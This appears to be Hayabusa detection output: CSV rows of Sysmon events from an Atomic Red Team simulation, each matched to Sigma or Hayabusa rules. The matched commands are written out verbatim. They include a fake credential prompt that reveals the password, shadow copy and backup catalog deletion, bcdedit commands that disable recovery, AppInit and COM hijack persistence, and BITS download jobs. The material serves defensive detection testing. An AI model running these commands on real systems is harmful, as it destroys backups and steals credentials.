HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.858 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:51.883 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4256 | PGUID: 747F3D96-D7DB-5D31-0000-001089A52A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:51.957 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | LID: 0x50951 | PID: 4452 | PGUID: 747F3D96-D7DB-5D31-0000-0010B5A82A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:51.957 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:21.972 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence or CredAccess - Lsa NotificationPackge | SetValue: HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages: Binary Data | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:21.972 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.096 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3968 | PGUID: 747F3D96-D809-5D31-0000-00100A242B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.127 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | LID: 0x50951 | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.147 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - AppInit | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs: C:\Tools\MessageBox64.dll,C:\Tools\MessageBox32.dll | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.147 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.147 +00:00,MSEDGEWIN10,13,medium,Persis,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_sysmon/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.168 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Windows Load | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.168 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.215 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D809-5D31-0000-001072292B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:40.691 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D80C-5D31-0000-0010223C2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:40.706 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe delete shadows /all /quiet | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | LID: 0x50951 | PID: 1124 | PGUID: 747F3D96-D80C-5D31-0000-0010843F2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:40.706 +00:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation_sysmon/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:40.863 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1348 | PGUID: 747F3D96-D80C-5D31-0000-001005542B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.585 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4500 | PGUID: 747F3D96-D811-5D31-0000-001000632B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.585 +00:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.624 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wbadmin.exe delete catalog -quiet | Process: C:\Windows\System32\wbadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | LID: 0x50951 | PID: 6160 | PGUID: 747F3D96-D811-5D31-0000-001061652B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.624 +00:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation_sysmon/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.624 +00:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.773 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wbengine.exe"" | Process: C:\Windows\System32\wbengine.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.958 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\vds.exe | Process: C:\Windows\System32\vds.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3184 | PGUID: 747F3D96-D811-5D31-0000-0010147C2B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:46.112 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2948 | PGUID: 747F3D96-D812-5D31-0000-0010AC892B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:46.302 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\wbengine.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00 | Hash: SHA1=BE65E71FC691867FFA1D3129CEAB67A0688A08CB,MD5=9A0C13D674AB2D72193653EF38D8FB8E,SHA256=15817A5CB717D4846AE753A27CD8859BCE63004143083027FA5EC9324DFC5188,IMPHASH=5694D579C32F1A7EB5FA54148C174C38",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:51.816 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-D817-5D31-0000-001064AD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:51.865 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D817-5D31-0000-001097B02B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:51.865 +00:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,rules/sigma/process_creation_sysmon/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:51.997 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6216 | PGUID: 747F3D96-D817-5D31-0000-001049B42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:51.997 +00:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:52.010 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} recoveryenabled no | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D817-5D31-0000-0010B7B62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:52.010 +00:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:52.010 +00:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,rules/sigma/process_creation_sysmon/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:52.046 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D817-5D31-0000-0010C8BA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:57.227 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1632 | PGUID: 747F3D96-D81D-5D31-0000-0010B8CA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:57.274 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7080 | PGUID: 747F3D96-D81D-5D31-0000-0010D7CD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:04.103 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6736 | PGUID: 747F3D96-D824-5D31-0000-001023F42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:04.131 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 1540 | PGUID: 747F3D96-D824-5D31-0000-001075F62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:04.131 +00:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation_sysmon/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:05.365 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5808 | PGUID: 747F3D96-D825-5D31-0000-0010CF222C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.640 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D83E-5D31-0000-0010F0D02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.660 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /create AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | LID: 0x50951 | PID: 4508 | PGUID: 747F3D96-D83E-5D31-0000-001042D32E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.799 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D83E-5D31-0000-0010A2D72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.799 +00:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation_sysmon/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.807 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3732 | PGUID: 747F3D96-D83E-5D31-0000-0010AAD92E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.807 +00:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation_sysmon/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.807 +00:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation_sysmon/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.900 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D83E-5D31-0000-001088DE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.900 +00:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation_sysmon/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.917 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3204 | PGUID: 747F3D96-D83E-5D31-0000-0010DAE02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:31.012 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4332 | PGUID: 747F3D96-D83E-5D31-0000-001046E52E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:31.041 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /complete AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | LID: 0x50951 | PID: 388 | PGUID: 747F3D96-D83F-5D31-0000-0010A2E72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:31.134 